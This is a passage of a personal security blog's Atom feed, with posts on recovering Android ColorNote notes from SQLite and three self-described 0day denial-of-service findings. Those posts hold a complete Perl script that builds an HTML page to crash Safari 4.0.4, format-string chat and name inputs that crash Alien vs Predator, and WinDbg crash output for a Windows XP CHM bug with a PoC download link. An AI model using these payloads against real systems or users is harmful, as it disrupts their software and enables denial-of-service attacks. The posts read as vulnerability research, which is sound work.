normal; font-weight: normal; line-height: normal; &quot;&gt;Android apps store data in the &quot;data&quot; folder. Having a large number of apps on my Phone, I now had to work out which folder was actually ColorNote.&lt;br /&gt;The easy way todo this is to look at the Apps ID in Google Market:&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;blockquote&gt;&lt;span style=&quot;font-size:78%;&quot;&gt;https://play.google.com/store/apps/details?id=&lt;b&gt;com.socialnmobile.dictapps.notepad.color.note&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;Sure enough, the folder is there. Within this folder is the folder &quot;databases&quot;.&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;This folder contains the following:&lt;/div&gt;&lt;blockquote style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;span style=&quot;font-size:78%;&quot;&gt;&lt;code&gt;colornote.db&lt;br /&gt;internal.db&lt;br /&gt;internal.db-shm&lt;br /&gt;internal.db-wal&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;Quickly examining the .DB files with a Hexeditor I confirmed they were SQLite 3 databases.&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;So I opened the colornote.db with &lt;a href=&quot;http://sqlitebrowser.sourceforge.net/&quot;&gt;SQLite Browser&lt;/a&gt;, switched to the &#39;Browse Data&#39; tab, and changed the table to &quot;notes&quot; and sure enough all my missing notes were there! woot! :)&lt;/div&gt;&lt;div style=&quot;font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; &quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span&gt;&lt;span style=&quot;font-size: 100%;&quot;&gt;Now what&#39;s also &lt;/span&gt;interesting&lt;span style=&quot;font-size: 100%;&quot;&gt;, all of my old deleted notes are also still stored, along with the &#39;create&#39;, &#39;modified&#39;, and &#39;minor modified&#39; dates.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/6698420375111103350/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2012/03/android-colornote-notes-recovery.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/6698420375111103350'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/6698420375111103350'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2012/03/android-colornote-notes-recovery.html' title='Android ColorNote, notes recovery'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-5446550841544973109</id><published>2011-08-22T13:28:00.009+00:00</published><updated>2014-05-10T15:08:19.875+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="0day"/><category scheme="http://www.blogger.com/atom/ns#" term="CHM"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="UNKNOWN"/><title type='text'>WinXP Compiled Help File (CHM) DoS (hh.exe)</title><content type='html'>Here&#39;s a PoC Windows XP &#39;Compiled Help File&#39; (CHM) DoS which has been sitting on my hard disk for a while, tested working on fully patched WinXP SP3 32bit machine:
&lt;br /&gt;
&lt;br /&gt;
Crashing Executable: hh.exe
&lt;br /&gt;
Version: 5.2.3790.2453
&lt;br /&gt;
&lt;br /&gt;
WinDbg result:
&lt;br /&gt;
&lt;blockquote&gt;
&lt;span style=&quot;font-size: 78%;&quot;&gt;&lt;code&gt;(ed8.edc): Stack overflow - code c00000fd (!!! second chance !!!)
&lt;br /&gt;eax=00042968 ebx=000af0b0 ecx=00042964 edx=0007ebb0 esi=000af0b0 edi=0007ebe0
&lt;br /&gt;eip=65e3d633 esp=0007e95c ebp=0007ebb4 iopl=0         nv up ei pl nz na po nc
&lt;br /&gt;cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
&lt;br /&gt;itss!_chkstk+0x33:
&lt;br /&gt;65e3d633 8501            test    dword ptr [ecx],eax  ds:0023:00042964=00000000
&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;
!exploitable result:
&lt;br /&gt;
&lt;blockquote&gt;
&lt;span style=&quot;font-size: 78%;&quot;&gt;&lt;code&gt;Exploitability Classification: UNKNOWN
&lt;br /&gt;Recommended Bug Title: Stack Overflow starting at itss!_chkstk+0x0000000000000033 (Hash=0x7c592e02.0x7a176714)
&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;
Download PoC &lt;a href=&quot;http://www.nobytes.com/exploits/nobytes26.zip&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/5446550841544973109/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2011/08/winxp-compiled-help-file-chm-dos-hhexe.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5446550841544973109'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5446550841544973109'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2011/08/winxp-compiled-help-file-chm-dos-hhexe.html' title='WinXP Compiled Help File (CHM) DoS (hh.exe)'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-8103405057804933834</id><published>2010-02-27T00:15:00.009+00:00</published><updated>2012-10-07T19:13:13.762+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="0day"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><title type='text'>New &#39;Alien vs Predator&#39; Format String Bugs</title><content type='html'>Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.&lt;br /&gt;
&lt;br /&gt;
Posting the following in Chat (either in game or in the lobby) will crash your game, I am not sure if it will crash other users, I haven&#39;t got anybody to test on.&lt;br /&gt;
&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
or&lt;br /&gt;
%n%n%n%n%n%n%n%n%n%n&lt;br /&gt;
&lt;br /&gt;
Setting your Name to: &#39;%n&#39; will stop you from ever joining a game, you just get an error reporting your unable to connect.&lt;br /&gt;
Setting your Name to &#39;%i&#39; will set your Name to random numbers which changes as you play.&lt;br /&gt;
&lt;br /&gt;
I tried contacting Steam/Rebellion/Sega, but so far had no response.</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/8103405057804933834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2010/02/alien-vs-predator-format-strings.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/8103405057804933834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/8103405057804933834'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2010/02/alien-vs-predator-format-strings.html' title='New &#39;Alien vs Predator&#39; Format String Bugs'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-3172990224068953918</id><published>2010-01-20T18:25:00.004+00:00</published><updated>2012-10-07T19:13:26.154+00:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="0day"/><category scheme="http://www.blogger.com/atom/ns#" term="exploit"/><title type='text'>New 0Day Safari &#39;background&#39; DoS</title><content type='html'>New 0Day Safari DoS I found last night. &lt;br /&gt;
Can somebody test to confirm its working for them?&lt;br /&gt;
Usage: &lt;i&gt;perl Safari_4.0.4_background_DoS.pl output.htm 114516&lt;/i&gt;&lt;br /&gt;
Then browse to output.htm in Safari.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;
&lt;span style=&quot;font-size: 78%;&quot;&gt;&lt;code&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#&lt;br /&gt;# Safari 4.0.4 (531.21.10) - Stack Overflow/run&lt;br /&gt;# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]&lt;br /&gt;# Tested on WinXP (32bit) SP3&lt;br /&gt;#&lt;br /&gt;# Magic Numbers:&lt;br /&gt;#                114516 -&amp;gt; 114718 : Safari quits without error&lt;br /&gt;#                114719           : Safari quits with illegal operation:&lt;br /&gt;#                                   AppName: safari.exe&lt;br /&gt;#                                   AppVer: 5.31.21.10&lt;br /&gt;#                                   ModName: cfnetwork.dll&lt;br /&gt;#                                   ModVer: 1.450.5.0&lt;br /&gt;#                                   Offset: 000567a7&lt;br /&gt;&lt;br /&gt;$filename = $ARGV[0];&lt;br /&gt;$buffer = $ARGV[1];&lt;br /&gt;if(!defined($filename))&lt;br /&gt;{&lt;br /&gt;     print &quot;Usage: $0 &amp;lt;filename.html&amp;gt; &amp;lt;buffer&amp;gt;\n\n&quot;;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;$header = &quot;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&quot; . &quot;\n&quot;;&lt;br /&gt;$crash  = &quot;&amp;lt;body background = \&quot;&quot; . &quot;A&quot; x $buffer . &quot;\&quot;&amp;gt;&quot; . &quot;\n&quot;;&lt;br /&gt;$footer = &quot;&amp;lt;/html&amp;gt;&quot; . &quot;\n&quot;;&lt;br /&gt;&lt;br /&gt;$data = $header . $crash . $footer;&lt;br /&gt;&lt;br /&gt;     open(FILE, &#39;&amp;gt;&#39; . $filename);&lt;br /&gt;     print FILE $data;&lt;br /&gt;     close(FILE);&lt;br /&gt;&lt;br /&gt;exit;&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;
</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/3172990224068953918/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2010/01/new-0day-safari-dos-i-found-last-night.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/3172990224068953918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/3172990224068953918'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2010/01/new-0day-safari-dos-i-found-last-night.html' title='New 0Day Safari &#39;background&#39; DoS'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry></feed>